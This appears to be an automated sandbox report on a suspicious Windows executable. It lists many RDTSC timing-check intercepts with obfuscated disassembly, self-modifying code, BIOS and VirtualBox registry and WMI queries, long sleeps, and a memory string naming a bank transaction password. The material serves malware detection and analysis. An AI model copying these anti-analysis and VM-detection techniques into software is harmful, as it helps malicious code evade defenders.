pushad 0x0000004f push ecx 0x00000050 pop edx 0x00000051 pushad 0x00000052 popad 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE000A second address: 4DE0010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0010 second address: 4DE0014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0014 second address: 4DE0029 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushad 0x0000000b mov edi, esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ebx, 1AA481F6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0029 second address: 4DE0071 instructions: 0x00000000 rdtsc 0x00000002 call 00007FEB1CC19F87h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007FEB1CC19F7Fh 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FEB1CC19F85h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0071 second address: 4DE0078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0078 second address: 4DE00A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub esp, 2Ch 0x0000000a pushad 0x0000000b mov esi, 31083AA7h 0x00000010 popad 0x00000011 xchg eax, ebx 0x00000012 jmp 00007FEB1CC19F7Ah 0x00000017 push eax 0x00000018 jmp 00007FEB1CC19F7Bh 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE00A8 second address: 4DE00AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE00AD second address: 4DE00D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, D8h 0x00000005 call 00007FEB1CC19F7Fh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pushad 0x00000010 mov eax, 00025981h 0x00000015 push eax 0x00000016 push edx 0x00000017 mov dh, ah 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE00D0 second address: 4DE0112 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEB1C7EA9E9h 0x00000008 sbb ax, 2386h 0x0000000d jmp 00007FEB1C7EA9E1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esp], edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov si, dx 0x0000001f mov ecx, edx 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE013C second address: 4DE0175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jmp 00007FEB1CC19F7Ch 0x0000000b pop esi 0x0000000c popad 0x0000000d mov ebx, 00000000h 0x00000012 pushad 0x00000013 call 00007FEB1CC19F7Ch 0x00000018 movzx eax, dx 0x0000001b pop edx 0x0000001c movzx eax, di 0x0000001f popad 0x00000020 mov edi, 00000000h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0175 second address: 4DE0186 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0186 second address: 4DE01D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a jmp 00007FEB1CC19F7Eh 0x0000000f test al, al 0x00000011 jmp 00007FEB1CC19F80h 0x00000016 je 00007FEB1CC1A14Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FEB1CC19F7Ah 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE01D0 second address: 4DE01D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE01D4 second address: 4DE01DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE01DA second address: 4DE01E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE01E0 second address: 4DE022B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ecx, dword ptr [ebp-14h] 0x0000000b pushad 0x0000000c mov edx, ecx 0x0000000e mov ecx, 192D7D4Dh 0x00000013 popad 0x00000014 mov dword ptr [ebp-14h], edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FEB1CC19F85h 0x00000020 xor cx, 23D6h 0x00000025 jmp 00007FEB1CC19F81h 0x0000002a popfd 0x0000002b mov di, ax 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE02A8 second address: 4DE02D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEB1C7EA9E2h 0x0000000e popad 0x0000000f test eax, eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE02D7 second address: 4DE02DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE02DB second address: 4DE02F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE02F8 second address: 4DE02FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE02FE second address: 4DE0302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0302 second address: 4DE0306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0306 second address: 4DE0319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FEB8D4A8B54h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ecx, ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0319 second address: 4DE03C5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEB1CC19F87h 0x00000008 or ch, 0000004Eh 0x0000000b jmp 00007FEB1CC19F89h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ch, 95h 0x00000015 popad 0x00000016 js 00007FEB1CC19FB4h 0x0000001c jmp 00007FEB1CC19F83h 0x00000021 cmp dword ptr [ebp-14h], edi 0x00000024 jmp 00007FEB1CC19F86h 0x00000029 jne 00007FEB8D8D808Ah 0x0000002f pushad 0x00000030 jmp 00007FEB1CC19F7Ah 0x00000035 popad 0x00000036 mov ebx, dword ptr [ebp+08h] 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007FEB1CC19F7Dh 0x00000042 xor ch, 00000046h 0x00000045 jmp 00007FEB1CC19F81h 0x0000004a popfd 0x0000004b mov ebx, ecx 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE04CA second address: 4DE0506 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FEB1C7EA9E0h 0x0000000c xor al, FFFFFFE8h 0x0000000f jmp 00007FEB1C7EA9DBh 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FEB1C7EA9E0h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0506 second address: 4DE050C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD07A8 second address: 4DD083A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FEB1C7EA9E6h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FEB1C7EA9DEh 0x00000018 sbb al, FFFFFFF8h 0x0000001b jmp 00007FEB1C7EA9DBh 0x00000020 popfd 0x00000021 push esi 0x00000022 pushfd 0x00000023 jmp 00007FEB1C7EA9DFh 0x00000028 add ax, CCBEh 0x0000002d jmp 00007FEB1C7EA9E9h 0x00000032 popfd 0x00000033 pop esi 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FEB1C7EA9E9h 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD083A second address: 4DD083E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD083E second address: 4DD0844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD0844 second address: 4DD0859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 mov bl, 7Dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, bx 0x00000011 mov si, bx 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD0859 second address: 4DD0898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEB1C7EA9DBh 0x0000000f xchg eax, ecx 0x00000010 pushad 0x00000011 mov edx, esi 0x00000013 popad 0x00000014 mov dword ptr [ebp-04h], 55534552h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FEB1C7EA9DFh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD0898 second address: 4DD089C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DD089C second address: 4DD08A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0A14 second address: 4DE0A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEB1CC19F84h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0A74 second address: 4DE0A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0A7A second address: 4DE0A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0A7E second address: 4DE0AC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FEB1C7EA9DBh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jmp 00007FEB1C7EA9E9h 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: 4DE0AC0 second address: 4DE0B30 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEB1CC19F84h 0x00000008 adc eax, 501D9BB8h 0x0000000e jmp 00007FEB1CC19F7Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b pushad 0x0000001c call 00007FEB1CC19F7Bh 0x00000021 pushfd 0x00000022 jmp 00007FEB1CC19F88h 0x00000027 sub si, 7548h 0x0000002c jmp 00007FEB1CC19F7Bh 0x00000031 popfd 0x00000032 pop esi 0x00000033 popad 0x00000034 pop eax 0x00000035 pushad 0x00000036 movsx edx, cx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DE0B30 second address: 4DE0B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, 7Bh 0x00000006 popad 0x00000007 popad 0x00000008 call 00007FEB8D49FA10h 0x0000000d push 75A92B70h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75AF4538h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 mov edx, ecx 0x00000057 pushfd 0x00000058 jmp 00007FEB1C7EA9DAh 0x0000005d or cl, FFFFFFD8h 0x00000060 jmp 00007FEB1C7EA9DBh 0x00000065 popfd 0x00000066 popad 0x00000067 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DE0B5D second address: 4DE0B65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DE0BB6 second address: 4DE0C03 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEB1C7EA9E8h 0x00000008 sub cl, FFFFFFF8h 0x0000000b jmp 00007FEB1C7EA9DBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jmp 00007FEB1C7EA9E8h 0x00000018 popad 0x00000019 test al, al 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DE0C03 second address: 4DE0C20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DE0C20 second address: 4DE0C30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEB1C7EA9DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DE0C30 second address: 4DE0C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DE0C34 second address: 4DE0C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FEB8D48E71Fh 0x0000000e pushad 0x0000000f movsx edx, ax 0x00000012 push eax 0x00000013 push edx 0x00000014 mov ax, A4FBh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0AFD second address: 4DF0B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0B03 second address: 4DF0B09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0B09 second address: 4DF0B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0B0D second address: 4DF0B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEB1C7EA9E1h 0x00000013 and esi, 5ECEB716h 0x00000019 jmp 00007FEB1C7EA9E1h 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0B46 second address: 4DF0B4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0B4B second address: 4DF0BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, bx 0x00000010 pushfd 0x00000011 jmp 00007FEB1C7EA9E7h 0x00000016 add cx, DDAEh 0x0000001b jmp 00007FEB1C7EA9E9h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0BA5 second address: 4DF0C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEB1CC19F87h 0x00000009 or eax, 1C2213BEh 0x0000000f jmp 00007FEB1CC19F89h 0x00000014 popfd 0x00000015 call 00007FEB1CC19F80h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f jmp 00007FEB1CC19F80h 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 mov bh, cl 0x00000028 pushfd 0x00000029 jmp 00007FEB1CC19F83h 0x0000002e or si, B32Eh 0x00000033 jmp 00007FEB1CC19F89h 0x00000038 popfd 0x00000039 popad 0x0000003a mov esi, dword ptr [ebp+0Ch] 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0C46 second address: 4DF0C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0C59 second address: 4DF0C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0C5F second address: 4DF0C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0C63 second address: 4DF0C7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0C7C second address: 4DF0C97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0C97 second address: 4DF0CE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007FEB1CC19F7Bh 0x0000000c or ax, 23FEh 0x00000011 jmp 00007FEB1CC19F89h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007FEB8D8B7662h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FEB1CC19F7Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0CE0 second address: 4DF0D02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AF459Ch], 05h 0x00000010 pushad 0x00000011 movzx esi, dx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0D02 second address: 4DF0D2D instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 je 00007FEB8D8CF703h 0x0000000e jmp 00007FEB1CC19F7Dh 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FEB1CC19F7Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0D2D second address: 4DF0D64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FEB1C7EA9DAh 0x00000012 call 00007FEB1C7EA9E2h 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0D64 second address: 4DF0D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEB1CC19F87h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | RDTSC instruction interceptor: First address: 4DF0D7F second address: 4DF0DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FEB1C7EA9DAh 0x00000015 or si, 8E08h 0x0000001a jmp 00007FEB1C7EA9DBh 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Special instruction interceptor: First address: 9F8FD5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Special instruction interceptor: First address: 9F88E2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Special instruction interceptor: First address: BBEDC7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Special instruction interceptor: First address: 9F881F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Special instruction interceptor: First address: C1EBD9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe TID: 4308 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe TID: 4308 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\MaZjv5XeQi.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: MaZjv5XeQi.exe, MaZjv5XeQi.exe, 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: MaZjv5XeQi.exe, 00000000.00000003.2158459932.0000000005757000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
